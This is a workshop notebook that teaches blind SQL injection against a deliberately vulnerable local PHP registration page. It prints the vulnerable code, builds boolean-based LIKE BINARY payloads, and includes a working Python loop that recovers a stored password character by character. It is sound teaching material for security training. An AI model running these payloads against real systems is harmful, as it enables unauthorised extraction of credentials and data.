# WORKSHOP 1: Web Penetration Testing 1
## Part two: blind injection
In this exercize, we'll be faced with another injection attack. This time, however, we won't be able to see the complete results of the query we make. All that the page will give us is a success or failure page. This may sound like an impenetrable barier, but it's not! With a bit of cleverness, we can't extract information just as completely as we did in part one.

Let's start by looking at the page. Play around with a few different queries. What shows up when you try to register your name? What about when you try to register FLAG? (Note: no registration is actually going on here; I'll get to that in a bit).

In [1]:
from IPython.display import IFrame, HTML

# I'm declaring URL as a global variable because the workshop
# is located on a local IP which is subject to change.
# Make sure you run this code first to declare the variable.
URL = 'http://172.16.4.60/ws1/register.php'

IFrame(URL, width='100%', height=400)

### Analysis
Like last time, we'll look at the html to get a better idea of what's going on.
```html
<h2>New User Registration</h2>
  <form action="register.php" method="post">
    <label for="username">Username:</label> <input type="username" id="username" name="username"><br><br>
    <label for="password">Password:</label> <input type="text" id="password" name="password"><br><br>
    <button type="submit">Register</button>
  </form>
```
So, it's a POST query with two parameters: "username" and "password". Also like last time, I'll show you the PHP code to make this a bit easier.
```PHP
\$link = mysqli_connect("127.0.0.1","ws1register","<password>","workshop1");
\$username = \$_POST["username"];
\$password = \$_POST["password"];
\$query = "select * from users2 where username ='" . \$username . "';";
\$result = \$link->query(\$query);
if (mysqli_num_rows(\$result) == 0) {
    echo "<h2>OK</h2>";
}
else {
    echo "<h2>Error: user exists</h2>";
}
mysqli_close(\$link);
```
(Note: the \\\$ are due to issues with Jupyter code markdown and MathJax. The actual code has no backslashes)

As I mentioned above, there's no actual registration going on here. In fact, the password field is completely discarded. All the code does is check if the user exist, then return OK if they do. I hope you noticed from looking at the code that this PHP is vulnerable to the same injection attack as the last part. But how can we exploit it?

### Attack
Before we move further, I'm going to introduce one more SQL concept. Here's an example statement:
```MySQL
SELECT * FROM users WHERE password LIKE BINARY "pass%";
```
`LIKE` is used to check for partial matches. The `%` is a wildcard: "pass%" will match "password", "pass123", "password321", and so on. The `BINARY` keyword in this case just means that the matching will be case sensitive: without this, we'll get the flag in all lowercase.

In other words, this statement will find all users whose password starts with pass. Let's write some code to test this out (you should make sure you understand what the query in this code looks like before continuing. It may help to write it out):

In [2]:
import requests

# in this query, we're just checking if there are any
# users in the database with a username starting with
# "FL". This should match the flag user.
payload = {"username" : "' OR username LIKE BINARY 'FL%'; #", "password" : "blah"}

response = requests.post(URL, data=payload)
display(HTML(response.text))

So, there exists a user whose username starts with "FL". This isn't really new information, because we already knew there was a user named "FLAG". Let's modify the code to see if we can find something interesting about this user's password:

In [3]:
# Notice that I'm still ignoring the password field
payload = {"username" : "FLAG' AND password LIKE BINARY 'a%'; #", "password" : "blah"}

response = requests.post(URL, data=payload)
display(HTML(response.text))

The response was "OK". What does this tell us? Let's look at the full query we're making:
```MySQL
SELECT * FROM users2 WHERE username ='FLAG' AND password LIKE BINARY 'a%'; #';
```
Notice that I'm not immediately escaping the intended input like we did in the previous workshop. I'm filling in the input as intended, then escaping it so I can add more stuff afterwards. In this case, I'm checking to see if there is a user named "FLAG" with a password which starts with a. This query fails, which tells me FLAG's password does not start with a.

Let's make the code a bit easier to use and try a few more characters:

In [4]:
password_guess = "b"
payload = {"username" : "FLAG' AND password LIKE BINARY '" + password_guess + "%'; #", "password" : "blah"}

response = requests.post(URL, data=payload)
display(HTML(response.text))

To check a different character, you can change "password_guess". I tried a few characters, then got bored. Why check characters manually when we can make python do it for us? Here's a loop to make our lives a little easier:

In [5]:
# Here are all the possible characters in a flag. FLAG's password is the flag,
# so I'm not going to bother checking for other values
possible_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"

for char in possible_chars:
    password_guess = char
    payload = {"username" : "FLAG' AND password LIKE BINARY '" + password_guess + "%'; #", "password" : "blah"}

    response = requests.post(URL, data=payload)
    if "Error: user exists" in response.text:
        print(password_guess)

5


This is the first time we've written any real code, so if you're new to python you should take a second to figure out what's going on here. I'm looping over every single character in the list of possible chars, checking if the password starts with that char each time. Python has a handy operator, `in`, which lets us see if the response text contains "Error: user exists". If it does, that means our query asking if FLAG's password starts with that character returned a result. In other words, FLAG's password does start with that character, so we should print it.

Now, it's not terribly interesting just knowing that FLAG's password starts with 5. What's the next character? To find out, we can modify our code a little knowing that the password starts with 5. I only changed one line, adding "5" to my password guess.

In [8]:
for char in possible_chars:
    password_guess = "5" + char
    payload = {"username" : "FLAG' AND password LIKE BINARY '" + password_guess + "%'; #", "password" : "blah"}

    response = requests.post(URL, data=payload)
    if "Error: user exists" in response.text:
        print(password_guess)

5V


If you're more patient than I am, you can keep changing this code to eventually extract the whole password. Now that you know the flag starts with "5V", you can change the "5" to "5V", and so on.

I'm not patient, though, so I'm going to wrap this whole thing in another loop and make python do that for me:

In [9]:
# We'll start with a blank password guess
password_guess = ""

# python doesn't have "do while" loops like C,
# so I'm doing this with "while True"
while True:
    new_character = False
    for char in possible_chars:
        # Our query will be what we know (password_guess)
        # plus what we think might be next (char)
        payload = {"username" : "FLAG' AND password LIKE BINARY '" + password_guess + char + "%'; #", "password" : "blah"}
        
        response = requests.post(URL, data=payload)
        if "Error: user exists" in response.text:
            # Update password_guess, because we know it includes char
            password_guess = password_guess + char
            print(password_guess)
            new_character = True
    
    # If we don't find a new character through the entire while loop,
    # the password can't be any longer. So we exit the loop by using
    # the "break" keyword
    if not new_character:
        break

5
5V
5Vt
5Vtf
5Vtfa
5Vtfar
5Vtfar8
5Vtfar8X
5Vtfar8XJ
5Vtfar8XJP
5Vtfar8XJPd
5Vtfar8XJPdx
5Vtfar8XJPdxq
5Vtfar8XJPdxqk
5Vtfar8XJPdxqkh
5Vtfar8XJPdxqkht


Great! As you can see, even without being able to see the results of our query directly we can extract everything we need. Remember, to protect against this attack all you need to do is input sanitization. 